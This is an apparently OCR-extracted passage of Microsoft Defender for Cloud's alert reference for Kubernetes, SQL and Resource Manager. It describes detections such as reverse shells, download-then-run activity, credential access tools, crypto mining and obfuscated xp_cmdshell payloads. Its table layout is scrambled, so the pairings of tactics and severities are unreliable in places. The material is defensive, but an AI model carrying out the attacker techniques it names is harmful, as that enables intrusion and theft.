InitialAccess 


PrivilegeEscalation 


DefenseEvasion 


Lateral Movement 


Lateral Movement, 
Credential Access 


Execution, Exfiltration, 
Exploitation 


Severity 


Medium 


Medium 


Medium 


Medium 


Medium 


Medium 


Alert (alert type) 


Anomalous pod deployment (Preview) 
(K8S_AnomalousPodDeployment) 2 


Anomalous secret access (Preview) 
(K8S_AnomalousSecretAccess) 2 


Attempt to stop apt-daily-upgrade.timer service 
detected 
(K8S.NODE_TimerServiceDisabled) 1 


Behavior similar to common Linux bots detected 
(Preview) 
(K8S.NODE_CommonBot) 


MITRE tactics 
(Learn more) 


Description 


Kubernetes audit log analysis Execution 
detected pod deployment which is 
anomalous based on previous pod 
deployment activity. This activity is 
considered an anomaly when taking 
into account how the different 
features seen in the deployment 
operation are in relations to one 
another. The features monitored 
include the container image registry 
used, the account performing the 
deployment, day of the week, how 
often this account performs pod 
deployments, user agent used in the 
operation, whether this is a 
namespace to which pod 
deployments often occur, and other 
features. Top contributing reasons for 
raising this alert as anomalous 
activity are detailed under the alert's 
extended properties. 


Kubernetes audit log analysis CredentialAccess 
detected secret access request which 
is anomalous based on previous 
secret access activity. This activity is 
considered an anomaly when taking 
into account how the different 
features seen in the secret access 
operation are in relations to one 
another. The features monitored by 
this analytics include the user name 
used, the name of the secret, the 
name of the namespace, user agent 
used in the operation, or other 
features. Top contributing reasons for 
raising this alert as anomalous 
activity are detailed under the alert 
extended properties. 


Analysis of processes running within DefenseEvasion 
a container or directly ona 
Kubernetes node, has detected an 
attempt to stop apt-daily- 
upgrade.timer service. Attackers have 
been observed stopping this service 
to download malicious files and 
grant execution privileges for their 
attacks. This activity can also happen 
if the service is updated through 
normal administrative actions. 


Analysis of processes running within Execution, Collection, 


a container or directly ona Command And 
Kubernetes node, has detected the Control 
execution of a process normally 

associated with common Linux 


botnets. 


Severity 


Medium 


Medium 


Informational 


Medium 


Alert (alert type) 


Behavior similar to Fairware ransomware detected 
(K8S.NODE_FairwareMalware) 1 


Command within a container running with high 
privileges 
(K8S.NODE_PrivilegedExecutionInContainer) 1 


Container running in privileged mode 
(K8S.NODE_PrivilegedContainerArtifacts) 1 


Container with a sensitive volume mount detected 
(K8S_SensitiveMount) 


CoreDNS modification in Kubernetes detected 
(K8S_CoreDnsModification) 2 3 


Description 


Analysis of processes running within 
a container detected the execution of 
rm -rf commands applied to 
suspicious locations. As rm -rf will 
recursively delete files, it is normally 
used on discrete folders. In this case, 
it is being used in a location that 
could remove a lot of data. Fairware 
ransomware is known to execute rm - 
rf commands in this folder. 


Machine logs indicate that a 
privileged command was run in a 
Docker container. A privileged 
command has extended privileges on 
the host machine. 


Analysis of processes running within 
a container or directly ona 
Kubernetes node, has detected the 
execution of a Docker command that 
is running a privileged container. The 
privileged container has full access to 
the hosting pod or host resource. If 
compromised, an attacker may use 
the privileged container to gain 
access to the hosting pod or host. 


Kubernetes audit log analysis 
detected a new container with a 
sensitive volume mount. The volume 
that was detected is a hostPath type 
which mounts a sensitive file or 
folder from the node to the 
container. If the container gets 
compromised, the attacker can use 
this mount for gaining access to the 
node. 


Kubernetes audit log analysis 
detected a modification of the 
CoreDNS configuration. The 
configuration of CoreDNS can be 
modified by overriding its configmap. 
While this activity can be legitimate, 
if attackers have permissions to 
modify the configmap, they can 
change the behavior of the cluster's 
DNS server and poison it. 


MITRE tactics 
(Learn more) 


Execution 


PrivilegeEscalation 


PrivilegeEscalation, 
Execution 


Privilege Escalation 


Lateral Movement 


Severity 


Medium 


Low 


Low 


Medium 


Low 


Alert (alert type) 


Creation of admission webhook configuration 
detected 
(K8S_AdmissionController) 2 


Detected file download from a known malicious 
source 
(K8S.NODE_SuspectDownload) | 


Detected suspicious file download 
(K8S.NODE_SuspectDownloadArtifacts) 1 


Detected suspicious use of the nohup command 
(K8S.NODE_SuspectNohup) ! 


Detected suspicious use of the useradd command 
(K8S.NODE_SuspectUserAddition) 1 


Digital currency mining container detected 
(K8S_MaliciousContainerlmage) 3 


Digital currency mining related behavior detected 
(K8S.NODE_DigitalCurrencyMining) ' 


MITRE tactics 
(Learn more) 


Description 


Credential Access, 
Persistence 


Kubernetes audit log analysis 
detected a new admission webhook 
configuration. Kubernetes has two 
built-in generic admission 
controllers: 
MutatingAdmissionWebhook and 
ValidatingAdmissionWebhook. The 
behavior of these admission 
controllers is determined by an 
admission webhook that the user 
deploys to the cluster. The usage of 
such admission controllers can be 
legitimate, however attackers can use 
such webhooks for modifying the 
requests (in case of 
MutatingAdmissionWebhook) or 
inspecting the requests and gain 
sensitive information (in case of 
ValidatingAdmissionWebhook). 


Analysis of processes running within PrivilegeEscalation, 
a container or directly ona 
Kubernetes node, has detected a Command And 
download of a file from a source Control 
frequently used to distribute 


malware. 


Analysis of processes running within Persistence 
a container or directly ona 
Kubernetes node, has detected a 


suspicious download of a remote file. 


Analysis of processes running within Persistence, 


a container or directly ona DefenseEvasion 
Kubernetes node, has detected a 

suspicious use of the nohup 

command. Attackers have been seen 

using the command nohup to run 

hidden files from a temporary 

directory to allow their executables 

to run in the background. It's rare to 

see this command run on hidden files 

located in a temporary directory. 


Analysis of processes running within Persistence 
a container or directly ona 

Kubernetes node, has detected a 

suspicious use of the useradd 


command. 


Kubernetes audit log analysis Execution 
detected a container that has an 
image associated with a digital 


currency mining tool. 


Analysis of processes running within Execution 
a container or directly ona 

Kubernetes node, has detected an 

execution of a process or command 

normally associated with digital 


currency mining. 


Execution, Exfiltration, 


Severity 


Low 


Medium 


Low 


Medium 


Medium 


High 


High 


Alert (alert type) 


Docker build operation detected on a Kubernetes 
node 
(K8S.NODE_ImageBuildOnNode) ! 


Excessive role permissions assigned in Kubernetes 
cluster (Preview) 
(K8S_ServiceAcountPermissionAnomaly) 3 


Executable found running from a suspicious 
location (Preview) 
(K8S.NODE_SuspectExecutablePath) 


Exposed Kubeflow dashboard detected 


(K8S_ExposedKubeflow) 


Exposed Kubernetes dashboard detected 
(K8S_ExposedDashboard) 


MITRE tactics 
(Learn more) 


Description 


Analysis of processes running within DefenseEvasion 
a container or directly ona 

Kubernetes node, has detected a 

build operation of a container image 

on a Kubernetes node. While this 

behavior might be legitimate, 
attackers might build their malicious 


images locally to avoid detection. 


Analysis of the Kubernetes audit logs 
detected an excessive permissions 
role assignment to your cluster. The 
listed permissions for the assigned 
roles are uncommon to the specific 
service account. This detection 
considers previous role assignments 
to the same service account across 
clusters monitored by Azure, volume 
per permission, and the impact of the 
specific permission. The anomaly 
detection model used for this alert 
takes into account how this 
permission is used across all clusters 
monitored by Microsoft Defender for 
Cloud. 


Analysis of processes running within Execution 
a container or directly ona 

Kubernetes node, has detected an 

executable file that is running from a 

location associated with known 

suspicious files. This executable could 

either be legitimate activity, or an 


indication of a compromised system. 


The Kubernetes audit log analysis Initial Access 
detected exposure of the Istio 

Ingress by a load balancer in a cluster 

that runs Kubeflow. This action might 

expose the Kubeflow dashboard to 

the internet. If the dashboard is 

exposed to the internet, attackers can 

access it and run malicious 


containers or code on the cluster. 


Find more details in the following 
article: 
https://aka.ms/exposedkubeflow- 
blog £ 

Kubernetes audit log analysis Initial Access 
detected exposure of the Kubernetes 

Dashboard by a LoadBalancer 

service. Exposed dashboard allows an 

unauthenticated access to the cluster 

management and poses a security 

threat. 


Privilege Escalation 


Severity 


Low 


Low 


Medium 


Medium 


High 


Alert (alert type) 


Exposed Kubernetes service detected 
(K8S_ExposedService) 


Exposed Redis service in AKS detected 
(K8S_ExposedRedis) 


Indicators associated with DDOS toolkit detected 
(K8S.NODE_KnownLinuxDDoSToolkit) 1 


K8S API requests from proxy IP address detected 
(K8S_TI_Proxy) 2 


Kubernetes events deleted 
(K8S_DeleteEvents) 2 3 


Kubernetes penetration testing tool detected 
(K8S_PenTestToolsKubeHunter) 


Manipulation of host firewall detected 
(K8S.NODE FirewallDisabled) 


Description 


The Kubernetes audit log analysis 
detected exposure of a service by a 
load balancer. This service is related 
to a sensitive application that allows 
high impact operations in the cluster 
such as running processes on the 
node or creating new containers. In 
some cases, this service doesn't 
require authentication. If the service 
doesn't require authentication, 
exposing it to the internet poses a 
security risk. 


The Kubernetes audit log analysis 
detected exposure of a Redis service 
by a load balancer. If the service 
doesn't require authentication, 
exposing it to the internet poses a 
security risk. 


Analysis of processes running within 
a container or directly ona 
Kubernetes node, has detected file 
names that are part of a toolkit 
associated with malware capable of 
launching DDoS attacks, opening 
ports and services, and taking full 
control over the infected system. This 
could also possibly be legitimate 
activity. 


Kubernetes audit log analysis 
detected API requests to your cluster 
from an IP address that is associated 
with proxy services, such as TOR. 
While this behavior can be legitimate, 
it's often seen in malicious activities, 
when attackers try to hide their 
source IP. 


Defender for Cloud detected that 
some Kubernetes events have been 
deleted. Kubernetes events are 
objects in Kubernetes that contain 
information about changes in the 
cluster. Attackers might delete those 
events for hiding their operations in 
the cluster. 


Kubernetes audit log analysis 
detected usage of Kubernetes 
penetration testing tool in the AKS 
cluster. While this behavior can be 
legitimate, attackers might use such 
public tools for malicious purposes. 


Analysis of processes running within 
a container or directly ona 
Kubernetes node, has detected a 
possible manipulation of the on-host 
firewall. Attackers will often disable 
this to exfiltrate data. 


MITRE tactics 
(Learn more) 


Initial Access 


Initial Access 


Persistence, 
LateralMovement, 
Execution, 
Exploitation 


Execution 


Defense Evasion 


Execution 


DefenseEvasion, 
Exfiltration 


Severity 


Medium 


Low 


Medium 


Low 


Low 


Low 


Medium 


Alert (alert type) 


Microsoft Defender for Cloud test alert (not a 
threat). 
(K8S.NODE_EICAR) ! 


New container in the kube-system namespace 
detected 
(K8S_KubeSystemContainer) ? 


New high privileges role detected 
(K8S_HighPrivilegesRole) ? 


Possible attack tool detected 
(K8S.NODE_KnownLinuxAttackTool) 1 


Possible backdoor detected 
(K8S.NODE_LinuxBackdoorArtifact) 1 


Possible command line exploitation attempt 
(K8S.NODE_ExploitAttempt) 1 


Possible credential access tool detected 


(K8S.NODE_KnownLinuxCredentialAccessTool) 1 


Possible Cryptocoinminer download detected 
(K8S.NODE_CryptoCoinMinerDownload) 1 


Description 


This is a test alert generated by 
Microsoft Defender for Cloud. No 


further 


action is needed. 


Kubernetes audit log analysis 


detected a new container in the 


kube-system namespace that isn't 


among the containers that normally 


run in this namespace. The kube- 


system namespaces shouldn't 
contain user resources. Attackers can 


use this namespace for hiding 


malicious components. 


Kubernetes audit log analysis 


detected a new role with high 


privileges. A binding to a role with 


high privileges gives the user\group 


high privileges in the cluster. 


Unnecessary privileges might cause 
privilege escalation in the cluster. 


Analysis of processes running within 
a container or directly ona 


Kubernetes node, has detected a 


suspicious tool invocation. This tool 


is often associated with malicious 


users attacking others. 


Analysis of processes runni 
a container or directly ona 
Kubernetes node, has dete 


suspici 


and run. This activity has p 


been a 


backdoor. 


Analysi 


ous file being down 


ssociated with insta 


s of processes runni 


a container or directly ona 


ng within 


cteda 


oaded 


reviously 


lation of a 


ng within 


Kubernetes node, has detected a 


possib 


a known vulnerability. 


Analysi 


s of processes runni 


a container or directly ona 
Kubernetes node, has detected a 


possib 
was ru 


e exploitation attempt against 


ng within 


e known credential access tool 
nning on the container, as 


identified by the specified process 


and commandline history item. This 


tool is often associated with attacker 


attempts to access credentials. 


Analysis of processes running within 


a container or directly ona 
Kubernetes node, has detected 


download of a file normally 


associated with digital currency 


mining. 


MITRE tactics 
(Learn more) 


Execution 


Persistence 


Persistence 


Execution, Collection, 


Command And 
Control, Probing 


Persistence, 
DefenseEvasion, 
Execution, 
Exploitation 


Exploitation 


CredentialAccess 


DefenseEvasion, 
Command And 


Control, Exploitation 


Severity 


High 


Low 


Low 


Medium 


Medium 


Medium 


Medium 


Medium 


Alert (alert type) 


Possible data exfiltration detected 
(K8S.NODE_DataEgressArtifacts) 1 


Possible Log Tampering Activity Detected 
(K8S.NODE_SystemLogRemoval) ! 


Possible password change using crypt-method 
detected 
(K8S.NODE_SuspectPasswordChange) 1 


Potential port forwarding to external IP address 
(K8S.NODE_SuspectPortForwarding) 1 


Potential reverse shell detected 
(K8S.NODE_ReverseShell) 1 


Privileged container detected 
(K8S_PrivilegedContainer) 


Process associated with digital currency mining 
detected 
(K8S.NODE_CryptoCoinMinerArtifacts) 1 


Process seen accessing the SSH authorized keys file 
in an unusual way 
(K8S.NODE_SshKeyAccess) | 


Description 


Analysis of processes running within 
a container or directly ona 
Kubernetes node, has detected a 
possible data egress condition. 
Attackers will often egress data from 
machines they have compromised. 


Analysis of processes running within 
a container or directly ona 
Kubernetes node, has detected a 
possible removal of files that tracks 
user's activity during the course of its 
operation. Attackers often try to 
evade detection and leave no trace 
of malicious activities by deleting 
such log files. 


Analysis of processes running within 
a container or directly ona 
Kubernetes node, has detected a 
password change using the crypt 
method. Attackers can make this 
change to continue access and gain 
persistence after compromise. 


Analysis of processes running within 
a container or directly ona 
Kubernetes node, has detected an 
initiation of port forwarding to an 
external IP address. 


Analysis of processes running within 
a container or directly ona 


Kubernetes node, has detected a 
potential reverse shell. These are 
used to get a compromised machine 
to call back into a machine an 
attacker owns. 


Kubernetes audit log analysis 
detected a new privileged container. 
A privileged container has access to 
the node's resources and breaks the 
isolation between containers. If 
compromised, an attacker can use 
the privileged container to gain 
access to the node. 


Analysis of processes running within 
a container detected the execution of 
a process normally associated with 
digital currency mining. 


An SSH authorized_keys file was 
accessed in a method similar to 
known malware campaigns. This 
access could signify that an actor is 
attempting to gain persistent access 
to a machine. 


MITRE tactics 
(Learn more) 


Collection, Exfiltration 


DefenseEvasion 


CredentialAccess 


Exfiltration, Command 
And Control 


Exfiltration, 
Exploitation 


Privilege Escalation 


Execution, 
Exploitation 


Unknown 


Severity 


Medium 


Medium 


Medium 


Medium 


Medium 


Low 


Medium 


Low 


Alert (alert type) 


Role binding to the cluster-admin role detected 
(K8S_ClusterAdminBinding) 


Security-related process termination detected 
(K8S.NODE_SuspectProcessTermination) 1 


SSH server is running inside a container 
(K8S.NODE_ContainerSSH) ' 


Suspicious file timestamp modification 
(K8S.NODE_TimestampTampering) ! 


Suspicious request to Kubernetes API 
(K8S.NODE_KubernetesAPI) ! 


Suspicious request to the Kubernetes Dashboard 
(K8S.NODE_KubernetesDashboard) ' 


Potential crypto coin miner started 
(K8S.NODE_CryptoCoinMinerExecution) 1 


Suspicious password access 
(K8S.NODE_SuspectPasswordFileAccess) 1 


Description 


Kubernetes audit log analysis 
detected a new binding to the 
cluster-admin role which gives 
administrator privileges. Unnecessary 
administrator privileges might cause 
privilege escalation in the cluster. 


Analysis of processes running within 
a container or directly on a 
Kubernetes node, has detected an 
attempt to terminate processes 


related to security monitoring on the 
container. Attackers will often try to 
terminate such processes using 
predefined scripts post-compromise. 


Analysis of processes running within 
a container detected an SSH server 
running inside the container. 


Analysis of processes running within 
a container or directly on a 
Kubernetes node, has detected a 
suspicious timestamp modification. 
Attackers will often copy timestamps 
from existing legitimate files to new 
tools to avoid detection of these 
newly dropped files. 


Analysis of processes running within 
a container indicates that a 
suspicious request was made to the 
Kubernetes API. The request was sent 
from a container in the cluster. 
Although this behavior can be 
intentional, it might indicate that a 
compromised container is running in 
the cluster. 


Analysis of processes running within 
a container indicates that a 
suspicious request was made to the 
Kubernetes Dashboard. The request 
was sent from a container in the 
cluster. Although this behavior can 
be intentional, it might indicate that 
a compromised container is running 
in the cluster. 


Analysis of processes running within 
a container or directly on a 
Kubernetes node, has detected a 
process being started in a way 
normally associated with digital 
currency mining. 


Analysis of processes running within 
a container or directly on a 
Kubernetes node, has detected 
suspicious attempt to access 
encrypted user passwords. 


MITRE tactics 
(Learn more) 


Persistence 


Persistence 


Execution 


Persistence, 
DefenseEvasion 


LateralMovement 


LateralMovement 


Execution 


Persistence 


Severity 


Low 


Low 


Medium 


Low 


Medium 


Medium 


Medium 


Informational 


Alert (alert type) Description MITRE tactics Severity 
(Learn more) 


Suspicious use of DNS over HTTPS Analysis of processes running within DefenseEvasion, Medium 
(K8S.NODE_SuspiciousDNSOverHttps) ' a container or directly ona Exfiltration 

Kubernetes node, has detected the 

use of a DNS call over HTTPS in an 

uncommon fashion. This technique is 

used by attackers to hide calls out to 

suspect or malicious sites. 


A possible connection to malicious location has Analysis of processes running within InitialAccess Medium 
been detected. a container or directly ona 
(K8S.NODE_ThreatIntelCommandLineSuspectDomain) Kubernetes node, has detected a 

connection to a location that has 
been reported to be malicious or 
unusual. This is an indicator that a 


compromise may have occurred. 


Possible malicious web shell detected. Analysis of processes running within Persistence, Medium 
(K8S.NODE_Webshell) 1 a container detected a possible web Exploitation 

shell. Attackers will often upload a 

web shell to a compute resource they 

have compromised to gain 

persistence or for further 

exploitation. 


Burst of multiple reconnaissance commands could Analysis of host/device data detected Discovery, Collection Low 
indicate initial activity after compromise execution of multiple reconnaissance 
(K8S.NODE_ReconnaissanceArtifactsBurst) 1 commands related to gathering 

system or host details performed by 

attackers after initial compromise. 


Suspicious Download Then Run Activity Analysis of processes running within Execution, Medium 
(K8S.NODE_DownloadAndRunCombo) ! a container or directly ona CommandAndControl, 
Kubernetes node, has detected a file Exploitation 


being downloaded then run in the 
same command. While this isn't 
always malicious, this is a very 
common technique attackers use to 
get malicious files onto victim 


machines. 
Digital currency mining activity Analysis of DNS transactions Exfiltration Low 
(K8S.NODE_CurrencyMining) ' detected digital currency mining 


activity. Such activity, while possibly 
legitimate user behavior, is 
frequently performed by attackers 
following compromise of resources. 
Typical related attacker activity is 
likely to include the download and 
execution of common mining tools. 


Access to kubelet kubeconfig file detected Analysis of processes running ona CredentialAccess Medium 

(K8S.NODE_KubeConfigAccess) 1 Kubernetes cluster node detected 
access to kubeconfig file on the host. 
The kubeconfig file, normally used by 
the Kubelet process, contains 
credentials to the Kubernetes cluster 
API server. Access to this file is often 
associated with attackers attempting 
to access those credentials, or with 
security scanning tools which check if 
the file is accessible. 


Alert (alert type) 


Access to cloud metadata service detected 
(K8S.NODE_ImdsCall) ! 


MITRE Caldera agent detected 
(K8S.NODE_MitreCalderaTools) ! 


MITRE tactics 
(Learn more) 


Description 


Analysis of processes running within CredentialAccess 
a container detected access to the 

cloud metadata service for acquiring 

identity token. The container doesn't 

normally perform such operation. 

While this behavior might be 

legitimate, attackers might use this 

technique to access cloud resources 

after gaining initial access to a 


running container. 


Analysis of processes running within Persistence, 


a container or directly ona PrivilegeEscalation, 
Kubernetes node, has detected a DefenseEvasion, 
suspicious process. This is often CredentialAccess, 
associated with the MITRE 54ndc47 


agent which could be used 


Discovery, 
LateralMovement, 
maliciously to attack other machines. Execution, Collection, 
Exfiltration, Command 
And Control, Probing, 


Exploitation 


1: Preview for non-AKS clusters: This alert is generally available for AKS clusters, but it is in preview for other 


environments, such as Azure Arc, EKS and GKE. 


Severity 


Medium 


Medium 


2: Limitations on GKE clusters: GKE uses a Kubernetes audit policy that doesn't support all alert types. As a result, this 


security alert, which is based on Kubernetes audit events, is not supported for GKE clusters. 


3: This alert is supported on Windows nodes/containers. 


Alerts for SQL Database and Azure Synapse Analytics 


Further details and notes 


Alert 


A possible vulnerability to SQL Injection 
(SQL.DB_VulnerabilityToSqllnjection 
SQL.VM_VulnerabilityToSqlInjection 
SQL.MI_VulnerabilityToSqlInjection 
SQL.DW_VulnerabilityToSqlInjection 
Synapse.SQLPool_VulnerabilityToSqlInjection) 


Attempted logon by a potentially harmful 
application 

(SQL.DB_HarmfulApplication 
SQL.VM_HarmfulApplication 
SQL.MI_HarmfulApplication 
SQL.DW_HarmfulApplication 
Synapse.SQLPool_HarmfulApplication) 


Description MITRE 
tactics 
(Learn 
more) 

An application has generated a faulty SQL statement in the PreAttack 

database. This can indicate a possible vulnerability to SQL 

injection attacks. There are two possible reasons for a faulty 

statement. A defect in application code might have 

constructed the faulty SQL statement. Or, application code 

or stored procedures didn't sanitize user input when 

constructing the faulty SQL statement, which can be 

exploited for SQL injection. 

A potentially harmful application attempted to access your PreAttack 


resource. 


Severity 


Medium 


High 


Alert 


Log on from an unusual Azure Data Center 
(SQL.DB_DataCenterAnomaly 
SQL.VM_DataCenterAnomaly 
SQL.DW_DataCenterAnomaly 
SQL.MI_DataCenterAnomaly 
Synapse.SQLPool_DataCenterAnomaly) 


Log on from an unusual location 
(SQL.DB_GeoAnomaly 
SQL.VM_GeoAnomaly 
SQL.DW_GeoAnomaly 
SQL.MI_GeoAnomaly 
Synapse.SQLPool_GeoAnomaly) 


Login from a principal user not seen in 60 
days 

(SQL.DB_PrincipalAnomaly 
SQL.VM_PrincipalAnomaly 
SQL.DW_PrincipalAnomaly 
SQL.MI_PrincipalAnomaly 
Synapse.SQLPool_PrincipalAnomaly) 


Login from a domain not seen in 60 days 
(SQL.DB_DomainAnomaly 
SQL.VM_DomainAnomaly 
SQL.DW_DomainAnomaly 
SQL.MI_DomainAnomaly 
Synapse.SQLPool_DomainAnomaly) 


Login from a suspicious IP 
(SQL.DB_SuspiciouslpAnomaly 
SQL.VM_SuspiciouslpAnomaly 
SQL.DW_SuspiciouslpAnomaly 
SQL.MI_SuspiciouslpAnomaly 
Synapse.SQLPool_SuspiciouslpAnomaly) 


Potential SQL injection 
(SQL.DB_PotentialSqllnjection 
SQL.VM_PotentialSqllnjection 
SQL.MI_PotentialSqllnjection 
SQL.DW_PotentialSqllnjection 
Synapse.SQLPool_PotentialSqllnjection) 


Suspected brute force attack using a valid 
user 

(SQL.DB_BruteForce 

SQL.VM_BruteForce 

SQL.DW_BruteForce 

SQL.MI_BruteForce 
Synapse.SQLPool_BruteForce) 


Suspected brute force attack 
(SQL.DB_BruteForce 
SQL.VM_BruteForce 
SQL.DW_BruteForce 
SQL.MI_BruteForce 
Synapse.SQLPool_BruteForce) 


Description 


There has been a change in the access pattern to an SQL 
Server, where someone has signed in to the server from an 
unusual Azure Data Center. In some cases, the alert detects 
a legitimate action (a new application or Azure service). In 
other cases, the alert detects a malicious action (attacker 
operating from breached resource in Azure). 


There has been a change in the access pattern to SQL 
Server, where someone has signed in to the server from an 
unusual geographical location. In some cases, the alert 
detects a legitimate action (a new application or developer 
maintenance). In other cases, the alert detects a malicious 
action (a former employee or external attacker). 


A principal user not seen in the last 60 days has logged 
into your database. If this database is new or this is 
expected behavior caused by recent changes in the users 
accessing the database, Defender for Cloud will identify 
significant changes to the access patterns and attempt to 
prevent future false positives. 


A user has logged in to your resource from a domain no 
other users have connected from in the last 60 days. If this 
resource is new or this is expected behavior caused by 
recent changes in the users accessing the resource, 
Defender for Cloud will identify significant changes to the 
access patterns and attempt to prevent future false 
positives. 


Your resource has been accessed successfully from an IP 
address that Microsoft Threat Intelligence has associated 
with suspicious activity. 


An active exploit has occurred against an identified 
application vulnerable to SQL injection. This means an 
attacker is trying to inject malicious SQL statements by 
using the vulnerable application code or stored procedures. 


A potential brute force attack has been detected on your 
resource. The attacker is using the valid user (username), 
which has permissions to log in. 


A potential brute force attack has been detected on your 
resource. 


MITRE 
tactics 
(Learn 
more) 


Probing 


Exploitation 


Exploitation 


Exploitation 


PreAttack 


PreAttack 


PreAttack 


PreAttack 


Severity 


Low 


Medium 


Medium 


Medium 


Medium 


High 


High 


High 


Alert 


Suspected successful brute force attack 
(SQL.DB_BruteForce 

SQL.VM_BruteForce 

SQL.DW_BruteForce 

SQL.MI_BruteForce 
Synapse.SQLPool_BruteForce) 


SQL Server potentially spawned a Windows 
command shell and accessed an abnormal 
external source 
(SQL.DB_ShellExternalSourceAnomaly 
SQL.VM_ShellExternalSourceAnomaly 
SQL.DW_ShellExternalSourceAnomaly 
SQL.MI_ShellExternalSourceAnomaly 
Synapse.SQLPool_ShellExternalSourceAnomaly) 


Unusual payload with obfuscated parts has 
been initiated by SQL Server 
(SQL.VM_PotentialSqllnjection) 


Description 


A successful login occurred after an apparent brute force 
attack on your resource. 


A suspicious SQL statement potentially spawned a 
Windows command shell with an external source that 
hasn't been seen before. Executing a shell that accesses an 
external source is a method used by attackers to download 
malicious payload and then execute it on the machine and 
compromise it. This enables an attacker to perform 
malicious tasks under remote direction. Alternatively, 
accessing an external source can be used to exfiltrate data 
to an external destination. 


Someone has initiated a new payload utilizing the layer in 
SQL Server that communicates with the operating system 
while concealing the command in the SQL query. Attackers 
commonly hide impactful commands which are popularly 
monitored like xp_cmdshell, sp_add_job and others. 
Obfuscation techniques abuse legitimate commands like 


string concatenation, casting, base changing, and others, to 


avoid regex detection and hurt the readability of the logs. 


Alerts for open-source relational databases 


Further details and notes 


Alert (alert type) 


Suspected brute force attack using a 
valid user 
(SQL.PostgreSQL_BruteForce 
SQL.MariaDB_BruteForce 
SQL.MySQL_BruteForce) 


Suspected successful brute force attack 
(SQL.PostgreSQL_BruteForce 
SQL.MySQL_BruteForce 
SQL.MariaDB_BruteForce) 


Suspected brute force attack 
(SQL.PostgreSQL_BruteForce 
SQL.MySQL_BruteForce 
SQL.MariaDB_BruteForce) 


Attempted logon by a potentially 
harmful application 
(SQL.PostgreSQL_HarmfulApplication 
SQL.MariaDB_HarmfulApplication 
SQL.MySQL_HarmfulApplication) 


Description 


A potential brute force attack has been detected on your 
resource. The attacker is using the valid user (username), which 
has permissions to log in. 


A successful login occurred after an apparent brute force attack 
on your resource. 


A potential brute force attack has been detected on your 
resource. 


A potentially harmful application attempted to access your 
resource. 


MITRE 
tactics 
(Learn 
more) 


PreAttack 


Execution 


Execution 


MITRE 
tactics 
(Learn 
more) 


PreAttack 


PreAttack 


PreAttack 


PreAttack 


Severity 


High 


High 


High 


Severity 


High 


High 


High 


High 


Alert (alert type) 


Login from a principal user not seen in 
60 days 
(SQL.PostgreSQL_PrincipalAnomaly 
SQL.MariaDB_PrincipalAnomaly 
SQL.MySQL_PrincipalAnomaly) 


Login from a domain not seen in 60 
days 
(SQL.MariaDB_DomainAnomaly 
SQL.PostgreSQL_DomainAnomaly 
SQL.MySQL_DomainAnomaly) 


Log on from an unusual Azure Data 
Center 
(SQL.PostgreSQL_DataCenterAnomaly 
SQL.MariaDB_DataCenterAnomaly 
SQL.MySQL_DataCenterAnomaly) 


Logon from an unusual cloud provider 
(SQL.PostgreSQL_CloudProviderAnomaly 
SQL.MariaDB_CloudProviderAnomaly 
SQL.MySQL_CloudProviderAnomaly) 


Log on from an unusual location 
(SQL.MariaDB_GeoAnomaly 
SQL.PostgreSQL_GeoAnomaly 
SQL.MySQL_GeoAnomaly) 


Login from a suspicious IP 
(SQL.PostgreSQL_SuspiciouslpAnomaly 
SQL.MariaDB_SuspiciouslpAnomaly 
SQL.MySQL_SuspiciouslpAnomaly) 


Description 


A principal user not seen in the last 60 days has logged into your 
database. If this database is new or this is expected behavior 
caused by recent changes in the users accessing the database, 
Defender for Cloud will identify significant changes to the access 
patterns and attempt to prevent future false positives. 


A user has logged in to your resource from a domain no other 
users have connected from in the last 60 days. If this resource is 
new or this is expected behavior caused by recent changes in the 
users accessing the resource, Defender for Cloud will identify 
significant changes to the access patterns and attempt to prevent 
future false positives. 


Someone logged on to your resource from an unusual Azure 
Data Center. 


Someone logged on to your resource from a cloud provider not 
seen in the last 60 days. It's quick and easy for threat actors to 
obtain disposable compute power for use in their campaigns. If 
this is expected behavior caused by the recent adoption of a new 
cloud provider, Defender for Cloud will learn over time and 
attempt to prevent future false positives. 


Someone logged on to your resource from an unusual Azure 
Data Center. 


Your resource has been accessed successfully from an IP address 
that Microsoft Threat Intelligence has associated with suspicious 
activity. 


Alerts for Resource Manager 


© Note 


MITRE Severity 
tactics 

(Learn 

more) 

Exploitation Medium 
Exploitation Medium 
Probing Low 
Exploitation Medium 
Exploitation Medium 
PreAttack Medium 


Alerts with a delegated access indication are triggered due to activity of third-party service providers. learn more 


about service providers activity indications. 


Further details and notes 


Alert (alert type) 


Azure Resource Manager operation from suspicious 


IP address 
(ARM_OperationFromSuspicious|P) 


Description MITRE Severity 
tactics 
(Learn 
more) 

Microsoft Defender for Resource Manager Execution Medium 


detected an operation from an IP address that 
has been marked as suspicious in threat 
intelligence feeds. 


Alert (alert type) 


Azure Resource Manager operation from suspicious 
proxy IP address 
(ARM_OperationFromSuspiciousProxyIP) 


MicroBurst exploitation toolkit used to enumerate 
resources in your subscriptions 
(ARM_MicroBurst.AzDomainInfo) 


MicroBurst exploitation toolkit used to enumerate 
resources in your subscriptions 
(ARM_MicroBurst.AzureDomainInfo) 


MicroBurst exploitation toolkit used to execute code 
on your virtual machine 
(ARM_MicroBurst.AzVMBulkKCMD) 


MicroBurst exploitation toolkit used to execute code 
on your virtual machine 
(RM_MicroBurst.AzureRMVMBulkCMD) 


MITRE 
tactics 


Description 


(Learn 
more) 


Microsoft Defender for Resource Manager Defense 


detected a resource management operation Evasion 
from an IP address that is associated with 

proxy services, such as TOR. While this 

behavior can be legitimate, it's often seen in 

malicious activities, when threat actors try to 


hide their source IP. 


A PowerShell script was run in your - 
subscription and performed suspicious pattern 
of executing an information gathering 
operations to discover resources, permissions, 
and network structures. Threat actors use 
automated scripts, like MicroBurst, to gather 
information for malicious activities. This was 
detected by analyzing Azure Resource 
Manager operations in your subscription. This 
operation might indicate that an identity in 
your organization was breached, and that the 
threat actor is trying to compromise your 
environment for malicious intentions. 


A PowerShell script was run in your - 
subscription and performed suspicious pattern 
of executing an information gathering 
operations to discover resources, permissions, 
and network structures. Threat actors use 
automated scripts, like MicroBurst, to gather 
information for malicious activities. This was 
detected by analyzing Azure Resource 
Manager operations in your subscription. This 
operation might indicate that an identity in 
your organization was breached, and that the 
threat actor is trying to compromise your 
environment for malicious intentions. 


A PowerShell script was run in your Execution 
subscription and performed a suspicious 
pattern of executing code on a VM or a list of 
VMs. Threat actors use automated scripts, like 
MicroBurst, to run a script on a VM for 
malicious activities. This was detected by 
analyzing Azure Resource Manager operations 
in your subscription. This operation might 
indicate that an identity in your organization 
was breached, and that the threat actor is 
trying to compromise your environment for 


malicious intentions. 


MicroBurst's exploitation toolkit was used to - 
execute code on your virtual machines. This 

